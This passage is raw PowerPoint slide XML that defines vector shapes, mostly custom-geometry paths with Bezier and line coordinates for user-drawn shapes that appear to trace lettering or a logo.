                        <a:pt x="19" y="17"/>
                        <a:pt x="19" y="17"/>
                        <a:pt x="19" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="17"/>
                        <a:pt x="32" y="17"/>
                        <a:pt x="32" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="22"/>
                        <a:pt x="31" y="26"/>
                        <a:pt x="28" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="31"/>
                        <a:pt x="21" y="33"/>
                        <a:pt x="17" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="33"/>
                        <a:pt x="7" y="31"/>
                        <a:pt x="3" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="24"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="0" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="14"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="6"/>
                        <a:pt x="5" y="4"/>
                        <a:pt x="8" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="1"/>
                        <a:pt x="13" y="0"/>
                        <a:pt x="16" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="0"/>
                        <a:pt x="21" y="1"/>
                        <a:pt x="24" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="3"/>
                        <a:pt x="28" y="4"/>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Rectangle 322"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10469563" y="4729163"/>
                  <a:ext cx="352425"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Rectangle 323"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10469563" y="4703763"/>
                  <a:ext cx="35242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Rectangle 324"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9894888" y="4786313"/>
                  <a:ext cx="539750"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325"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10412413" y="4729163"/>
                  <a:ext cx="57150" cy="66675"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 36"/>
                    <a:gd name="T1" fmla="*/ 42 h 42"/>
                    <a:gd name="T2" fmla="*/ 36 w 36"/>
                    <a:gd name="T3" fmla="*/ 22 h 42"/>
                    <a:gd name="T4" fmla="*/ 36 w 36"/>
                    <a:gd name="T5" fmla="*/ 0 h 42"/>
                    <a:gd name="T6" fmla="*/ 0 w 36"/>
                    <a:gd name="T7" fmla="*/ 36 h 42"/>
                    <a:gd name="T8" fmla="*/ 14 w 36"/>
                    <a:gd name="T9" fmla="*/ 42 h 42"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="36" h="42">
                      <a:moveTo>
                        <a:pt x="14" y="42"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="36" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="36" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1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326"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9956800" y="4554538"/>
                  <a:ext cx="50800" cy="73025"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 32"/>
                    <a:gd name="T1" fmla="*/ 0 h 46"/>
                    <a:gd name="T2" fmla="*/ 4 w 32"/>
                    <a:gd name="T3" fmla="*/ 0 h 46"/>
                    <a:gd name="T4" fmla="*/ 4 w 32"/>
                    <a:gd name="T5" fmla="*/ 19 h 46"/>
                    <a:gd name="T6" fmla="*/ 28 w 32"/>
                    <a:gd name="T7" fmla="*/ 19 h 46"/>
                    <a:gd name="T8" fmla="*/ 28 w 32"/>
                    <a:gd name="T9" fmla="*/ 0 h 46"/>
                    <a:gd name="T10" fmla="*/ 32 w 32"/>
                    <a:gd name="T11" fmla="*/ 0 h 46"/>
                    <a:gd name="T12" fmla="*/ 32 w 32"/>
                    <a:gd name="T13" fmla="*/ 46 h 46"/>
                    <a:gd name="T14" fmla="*/ 28 w 32"/>
                    <a:gd name="T15" fmla="*/ 46 h 46"/>
                    <a:gd name="T16" fmla="*/ 28 w 32"/>
                    <a:gd name="T17" fmla="*/ 24 h 46"/>
                    <a:gd name="T18" fmla="*/ 4 w 32"/>
                    <a:gd name="T19" fmla="*/ 24 h 46"/>
                    <a:gd name="T20" fmla="*/ 4 w 32"/>
                    <a:gd name="T21" fmla="*/ 46 h 46"/>
                    <a:gd name="T22" fmla="*/ 0 w 32"/>
                    <a:gd name="T23" fmla="*/ 46 h 46"/>
                    <a:gd name="T24" fmla="*/ 0 w 32"/>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46">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="4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327"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10018713" y="4554538"/>
                  <a:ext cx="50800" cy="73025"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 32"/>
                    <a:gd name="T1" fmla="*/ 0 h 46"/>
                    <a:gd name="T2" fmla="*/ 5 w 32"/>
                    <a:gd name="T3" fmla="*/ 0 h 46"/>
                    <a:gd name="T4" fmla="*/ 16 w 32"/>
                    <a:gd name="T5" fmla="*/ 19 h 46"/>
                    <a:gd name="T6" fmla="*/ 28 w 32"/>
                    <a:gd name="T7" fmla="*/ 0 h 46"/>
                    <a:gd name="T8" fmla="*/ 32 w 32"/>
                    <a:gd name="T9" fmla="*/ 0 h 46"/>
                    <a:gd name="T10" fmla="*/ 19 w 32"/>
                    <a:gd name="T11" fmla="*/ 24 h 46"/>
                    <a:gd name="T12" fmla="*/ 19 w 32"/>
                    <a:gd name="T13" fmla="*/ 46 h 46"/>
                    <a:gd name="T14" fmla="*/ 15 w 32"/>
                    <a:gd name="T15" fmla="*/ 46 h 46"/>
                    <a:gd name="T16" fmla="*/ 15 w 32"/>
                    <a:gd name="T17" fmla="*/ 24 h 46"/>
                    <a:gd name="T18" fmla="*/ 0 w 32"/>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6">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="5" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="28" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="2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328"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10074275" y="4554538"/>
                  <a:ext cx="41275" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 18"/>
                    <a:gd name="T1" fmla="*/ 25 h 32"/>
                    <a:gd name="T2" fmla="*/ 3 w 18"/>
                    <a:gd name="T3" fmla="*/ 24 h 32"/>
                    <a:gd name="T4" fmla="*/ 9 w 18"/>
                    <a:gd name="T5" fmla="*/ 29 h 32"/>
                    <a:gd name="T6" fmla="*/ 12 w 18"/>
                    <a:gd name="T7" fmla="*/ 28 h 32"/>
                    <a:gd name="T8" fmla="*/ 14 w 18"/>
                    <a:gd name="T9" fmla="*/ 26 h 32"/>
                    <a:gd name="T10" fmla="*/ 15 w 18"/>
                    <a:gd name="T11" fmla="*/ 24 h 32"/>
                    <a:gd name="T12" fmla="*/ 14 w 18"/>
                    <a:gd name="T13" fmla="*/ 21 h 32"/>
                    <a:gd name="T14" fmla="*/ 9 w 18"/>
                    <a:gd name="T15" fmla="*/ 16 h 32"/>
                    <a:gd name="T16" fmla="*/ 4 w 18"/>
                    <a:gd name="T17" fmla="*/ 12 h 32"/>
                    <a:gd name="T18" fmla="*/ 2 w 18"/>
                    <a:gd name="T19" fmla="*/ 7 h 32"/>
                    <a:gd name="T20" fmla="*/ 3 w 18"/>
                    <a:gd name="T21" fmla="*/ 3 h 32"/>
                    <a:gd name="T22" fmla="*/ 6 w 18"/>
                    <a:gd name="T23" fmla="*/ 1 h 32"/>
                    <a:gd name="T24" fmla="*/ 10 w 18"/>
                    <a:gd name="T25" fmla="*/ 0 h 32"/>
                    <a:gd name="T26" fmla="*/ 14 w 18"/>
                    <a:gd name="T27" fmla="*/ 1 h 32"/>
                    <a:gd name="T28" fmla="*/ 18 w 18"/>
                    <a:gd name="T29" fmla="*/ 5 h 32"/>
                    <a:gd name="T30" fmla="*/ 15 w 18"/>
                    <a:gd name="T31" fmla="*/ 7 h 32"/>
                    <a:gd name="T32" fmla="*/ 12 w 18"/>
                    <a:gd name="T33" fmla="*/ 4 h 32"/>
                    <a:gd name="T34" fmla="*/ 10 w 18"/>
                    <a:gd name="T35" fmla="*/ 3 h 32"/>
                    <a:gd name="T36" fmla="*/ 7 w 18"/>
                    <a:gd name="T37" fmla="*/ 4 h 32"/>
                    <a:gd name="T38" fmla="*/ 5 w 18"/>
                    <a:gd name="T39" fmla="*/ 7 h 32"/>
                    <a:gd name="T40" fmla="*/ 6 w 18"/>
                    <a:gd name="T41" fmla="*/ 9 h 32"/>
                    <a:gd name="T42" fmla="*/ 7 w 18"/>
                    <a:gd name="T43" fmla="*/ 11 h 32"/>
                    <a:gd name="T44" fmla="*/ 11 w 18"/>
                    <a:gd name="T45" fmla="*/ 14 h 32"/>
                    <a:gd name="T46" fmla="*/ 17 w 18"/>
                    <a:gd name="T47" fmla="*/ 19 h 32"/>
                    <a:gd name="T48" fmla="*/ 18 w 18"/>
                    <a:gd name="T49" fmla="*/ 24 h 32"/>
                    <a:gd name="T50" fmla="*/ 16 w 18"/>
                    <a:gd name="T51" fmla="*/ 29 h 32"/>
                    <a:gd name="T52" fmla="*/ 10 w 18"/>
                    <a:gd name="T53" fmla="*/ 32 h 32"/>
                    <a:gd name="T54" fmla="*/ 4 w 18"/>
                    <a:gd name="T55" fmla="*/ 30 h 32"/>
                    <a:gd name="T56" fmla="*/ 0 w 18"/>
                    <a:gd name="T57" fmla="*/ 2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32">
                      <a:moveTo>
                        <a:pt x="0" y="25"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="24"/>
                        <a:pt x="3" y="24"/>
                        <a:pt x="3" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="27"/>
                        <a:pt x="7" y="29"/>
                        <a:pt x="9" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="29"/>
                        <a:pt x="11" y="29"/>
                        <a:pt x="12" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="28"/>
                        <a:pt x="14" y="27"/>
                        <a:pt x="14" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="25"/>
                        <a:pt x="15" y="25"/>
                        <a:pt x="15" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="23"/>
                        <a:pt x="15" y="22"/>
                        <a:pt x="14" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="19"/>
                        <a:pt x="11" y="18"/>
                        <a:pt x="9" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="14"/>
                        <a:pt x="4" y="12"/>
                        <a:pt x="4" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="10"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="3" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="2"/>
                        <a:pt x="5" y="1"/>
                        <a:pt x="6" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="10" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="12" y="0"/>
                        <a:pt x="14" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="1"/>
                        <a:pt x="16" y="3"/>
                        <a:pt x="18" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="5"/>
                        <a:pt x="13" y="4"/>
                        <a:pt x="12" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="3"/>
                        <a:pt x="11" y="3"/>
                        <a:pt x="10" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="3"/>
                        <a:pt x="7" y="3"/>
                        <a:pt x="7" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="5"/>
                        <a:pt x="5" y="6"/>
                        <a:pt x="5" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="7"/>
                        <a:pt x="6" y="8"/>
                        <a:pt x="6" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="7" y="10"/>
                        <a:pt x="7" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="11"/>
                        <a:pt x="9" y="12"/>
                        <a:pt x="11" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="16"/>
                        <a:pt x="16" y="17"/>
                        <a:pt x="17" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="21"/>
                        <a:pt x="18" y="22"/>
                        <a:pt x="18" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="26"/>
                        <a:pt x="17" y="28"/>
                        <a:pt x="16" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="31"/>
                        <a:pt x="12" y="32"/>
                        <a:pt x="10" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="32"/>
                        <a:pt x="6" y="31"/>
                        <a:pt x="4" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="29"/>
                        <a:pt x="2" y="28"/>
                        <a:pt x="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329"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10125075" y="4554538"/>
                  <a:ext cx="38100" cy="73025"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 24"/>
                    <a:gd name="T1" fmla="*/ 5 h 46"/>
                    <a:gd name="T2" fmla="*/ 0 w 24"/>
                    <a:gd name="T3" fmla="*/ 0 h 46"/>
                    <a:gd name="T4" fmla="*/ 24 w 24"/>
                    <a:gd name="T5" fmla="*/ 0 h 46"/>
                    <a:gd name="T6" fmla="*/ 24 w 24"/>
                    <a:gd name="T7" fmla="*/ 5 h 46"/>
                    <a:gd name="T8" fmla="*/ 15 w 24"/>
                    <a:gd name="T9" fmla="*/ 5 h 46"/>
                    <a:gd name="T10" fmla="*/ 15 w 24"/>
                    <a:gd name="T11" fmla="*/ 46 h 46"/>
                    <a:gd name="T12" fmla="*/ 9 w 24"/>
                    <a:gd name="T13" fmla="*/ 46 h 46"/>
                    <a:gd name="T14" fmla="*/ 9 w 24"/>
                    <a:gd name="T15" fmla="*/ 5 h 46"/>
                    <a:gd name="T16" fmla="*/ 0 w 24"/>
                    <a:gd name="T17"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46">
                      <a:moveTo>
                        <a:pt x="0" y="5"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="5"/>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330"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10169525" y="4554538"/>
                  <a:ext cx="76200" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 16 w 33"/>
                    <a:gd name="T1" fmla="*/ 0 h 32"/>
                    <a:gd name="T2" fmla="*/ 28 w 33"/>
                    <a:gd name="T3" fmla="*/ 4 h 32"/>
                    <a:gd name="T4" fmla="*/ 33 w 33"/>
                    <a:gd name="T5" fmla="*/ 16 h 32"/>
                    <a:gd name="T6" fmla="*/ 28 w 33"/>
                    <a:gd name="T7" fmla="*/ 27 h 32"/>
                    <a:gd name="T8" fmla="*/ 17 w 33"/>
                    <a:gd name="T9" fmla="*/ 32 h 32"/>
                    <a:gd name="T10" fmla="*/ 5 w 33"/>
                    <a:gd name="T11" fmla="*/ 27 h 32"/>
                    <a:gd name="T12" fmla="*/ 0 w 33"/>
                    <a:gd name="T13" fmla="*/ 16 h 32"/>
                    <a:gd name="T14" fmla="*/ 3 w 33"/>
                    <a:gd name="T15" fmla="*/ 8 h 32"/>
                    <a:gd name="T16" fmla="*/ 8 w 33"/>
                    <a:gd name="T17" fmla="*/ 2 h 32"/>
                    <a:gd name="T18" fmla="*/ 16 w 33"/>
                    <a:gd name="T19" fmla="*/ 0 h 32"/>
                    <a:gd name="T20" fmla="*/ 17 w 33"/>
                    <a:gd name="T21" fmla="*/ 3 h 32"/>
                    <a:gd name="T22" fmla="*/ 10 w 33"/>
                    <a:gd name="T23" fmla="*/ 4 h 32"/>
                    <a:gd name="T24" fmla="*/ 5 w 33"/>
                    <a:gd name="T25" fmla="*/ 9 h 32"/>
                    <a:gd name="T26" fmla="*/ 4 w 33"/>
                    <a:gd name="T27" fmla="*/ 16 h 32"/>
                    <a:gd name="T28" fmla="*/ 7 w 33"/>
                    <a:gd name="T29" fmla="*/ 25 h 32"/>
                    <a:gd name="T30" fmla="*/ 17 w 33"/>
                    <a:gd name="T31" fmla="*/ 29 h 32"/>
                    <a:gd name="T32" fmla="*/ 23 w 33"/>
                    <a:gd name="T33" fmla="*/ 27 h 32"/>
                    <a:gd name="T34" fmla="*/ 28 w 33"/>
                    <a:gd name="T35" fmla="*/ 22 h 32"/>
                    <a:gd name="T36" fmla="*/ 30 w 33"/>
                    <a:gd name="T37" fmla="*/ 16 h 32"/>
                    <a:gd name="T38" fmla="*/ 28 w 33"/>
                    <a:gd name="T39" fmla="*/ 9 h 32"/>
                    <a:gd name="T40" fmla="*/ 23 w 33"/>
                    <a:gd name="T41" fmla="*/ 4 h 32"/>
                    <a:gd name="T42" fmla="*/ 17 w 33"/>
                    <a:gd name="T43"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 h="32">
                      <a:moveTo>
                        <a:pt x="16" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="0"/>
                        <a:pt x="25" y="1"/>
                        <a:pt x="28" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="7"/>
                        <a:pt x="33" y="11"/>
                        <a:pt x="33" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="20"/>
                        <a:pt x="31" y="24"/>
                        <a:pt x="28" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="30"/>
                        <a:pt x="21" y="32"/>
                        <a:pt x="17" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="32"/>
                        <a:pt x="8" y="30"/>
                        <a:pt x="5" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="24"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="0" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="13"/>
                        <a:pt x="1" y="10"/>
                        <a:pt x="3" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="5"/>
                        <a:pt x="6" y="3"/>
                        <a:pt x="8" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="14" y="0"/>
                        <a:pt x="16" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="17" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="3"/>
                        <a:pt x="12" y="3"/>
                        <a:pt x="10" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="6"/>
                        <a:pt x="6" y="7"/>
                        <a:pt x="5" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="11"/>
                        <a:pt x="4" y="13"/>
                        <a:pt x="4" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="20"/>
                        <a:pt x="5" y="23"/>
                        <a:pt x="7" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="28"/>
                        <a:pt x="13" y="29"/>
                        <a:pt x="17" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="29"/>
                        <a:pt x="21" y="28"/>
                        <a:pt x="23" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="26"/>
                        <a:pt x="27" y="24"/>
                        <a:pt x="28" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="20"/>
                        <a:pt x="30" y="18"/>
                        <a:pt x="30" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="13"/>
                        <a:pt x="29" y="11"/>
                        <a:pt x="28" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="7"/>
                        <a:pt x="25" y="6"/>
                        <a:pt x="23" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="3"/>
                        <a:pt x="19" y="3"/>
                        <a:pt x="1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331"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10260013" y="4554538"/>
                  <a:ext cx="46038" cy="73025"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 20"/>
                    <a:gd name="T1" fmla="*/ 0 h 31"/>
                    <a:gd name="T2" fmla="*/ 6 w 20"/>
                    <a:gd name="T3" fmla="*/ 0 h 31"/>
                    <a:gd name="T4" fmla="*/ 13 w 20"/>
                    <a:gd name="T5" fmla="*/ 1 h 31"/>
                    <a:gd name="T6" fmla="*/ 17 w 20"/>
                    <a:gd name="T7" fmla="*/ 4 h 31"/>
                    <a:gd name="T8" fmla="*/ 19 w 20"/>
                    <a:gd name="T9" fmla="*/ 9 h 31"/>
                    <a:gd name="T10" fmla="*/ 18 w 20"/>
                    <a:gd name="T11" fmla="*/ 13 h 31"/>
                    <a:gd name="T12" fmla="*/ 15 w 20"/>
                    <a:gd name="T13" fmla="*/ 16 h 31"/>
                    <a:gd name="T14" fmla="*/ 9 w 20"/>
                    <a:gd name="T15" fmla="*/ 17 h 31"/>
                    <a:gd name="T16" fmla="*/ 20 w 20"/>
                    <a:gd name="T17" fmla="*/ 31 h 31"/>
                    <a:gd name="T18" fmla="*/ 16 w 20"/>
                    <a:gd name="T19" fmla="*/ 31 h 31"/>
                    <a:gd name="T20" fmla="*/ 5 w 20"/>
                    <a:gd name="T21" fmla="*/ 17 h 31"/>
                    <a:gd name="T22" fmla="*/ 3 w 20"/>
                    <a:gd name="T23" fmla="*/ 17 h 31"/>
                    <a:gd name="T24" fmla="*/ 3 w 20"/>
                    <a:gd name="T25" fmla="*/ 31 h 31"/>
                    <a:gd name="T26" fmla="*/ 0 w 20"/>
                    <a:gd name="T27" fmla="*/ 31 h 31"/>
                    <a:gd name="T28" fmla="*/ 0 w 20"/>
                    <a:gd name="T29" fmla="*/ 0 h 31"/>
                    <a:gd name="T30" fmla="*/ 3 w 20"/>
                    <a:gd name="T31" fmla="*/ 3 h 31"/>
                    <a:gd name="T32" fmla="*/ 3 w 20"/>
                    <a:gd name="T33" fmla="*/ 14 h 31"/>
                    <a:gd name="T34" fmla="*/ 8 w 20"/>
                    <a:gd name="T35" fmla="*/ 14 h 31"/>
                    <a:gd name="T36" fmla="*/ 13 w 20"/>
                    <a:gd name="T37" fmla="*/ 13 h 31"/>
                    <a:gd name="T38" fmla="*/ 15 w 20"/>
                    <a:gd name="T39" fmla="*/ 11 h 31"/>
                    <a:gd name="T40" fmla="*/ 16 w 20"/>
                    <a:gd name="T41" fmla="*/ 9 h 31"/>
                    <a:gd name="T42" fmla="*/ 15 w 20"/>
                    <a:gd name="T43" fmla="*/ 6 h 31"/>
                    <a:gd name="T44" fmla="*/ 13 w 20"/>
                    <a:gd name="T45" fmla="*/ 4 h 31"/>
                    <a:gd name="T46" fmla="*/ 8 w 20"/>
                    <a:gd name="T47" fmla="*/ 3 h 31"/>
                    <a:gd name="T48" fmla="*/ 3 w 20"/>
                    <a:gd name="T4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31">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="0"/>
                        <a:pt x="12" y="1"/>
                        <a:pt x="13" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="1"/>
                        <a:pt x="16" y="2"/>
